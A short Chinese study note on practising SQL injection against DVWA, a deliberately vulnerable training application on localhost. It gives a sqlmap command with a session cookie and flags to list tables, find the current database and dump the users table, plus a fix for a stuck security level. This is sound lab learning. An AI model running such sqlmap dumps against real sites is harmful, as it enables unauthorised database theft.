遇见的问题
1.设置安全等级为low后依然执行impossible
找到该文件,将low文件复制到impossible
sql注入
sqlmap.py -u "http://localhost/DVWA/vulnerabilities/sqli/?id=1&Submit=Submit" --cookie="security=impossible; security=low; PHPSESSID=joeovbh2dahqkk1u3tk0osf0c7"
这里cookie中出现两个security,可能就是问题所在。
如果不输入cookie也是可以的
--tables
获取了所有数据库及库中的所有表
--current-db
获取当前数据库名
-T users --dump
获取users表内信息
过程中需要输入no
参考网址
http://blog.chinaunix.net/uid-11582448-id-4432211.html